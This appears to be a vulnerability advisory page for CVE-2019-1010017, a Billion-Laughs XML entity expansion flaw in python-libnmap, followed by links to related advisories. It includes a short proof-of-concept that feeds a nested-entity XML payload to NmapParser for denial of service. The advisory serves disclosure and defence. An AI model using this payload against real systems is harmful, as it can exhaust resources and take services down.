Lucene search
GoogleOSV:GHSA-9CCV-P7FG-M73XHistoryJul 18, 2019 - 3:38 p.m.
XML Injection in python-libnmap
2019-07-1815:38:41
Google
osv.dev
6
0.001 Low
EPSS
Percentile
49.7%
Description
python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability.
PoC
ty = NmapParser()
payload = """
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""
ty.parse(payload)
Related
osv
osv
PYSEC-2019-218
2019-07-15 03:15:00
CVE-2019-1010017
2019-07-15 03:15:10
cvelist
cvelist
CVE-2019-1010017
2019-07-15 02:25:52
ubuntucve
ubuntucve
CVE-2019-1010017
2019-07-15 00:00:00
debiancve
debiancve
CVE-2019-1010017
2019-07-15 03:15:10
nvd
nvd
CVE-2019-1010017
2019-07-15 03:15:10
github
github
XML Injection in python-libnmap
2019-07-18 15:38:41
cve
cve
CVE-2019-1010017
2019-07-15 03:15:10
veracode
veracode
XML Injection
2019-07-15 08:10:16
prion
prion
Design/Logic Flaw
2019-07-15 03:15:00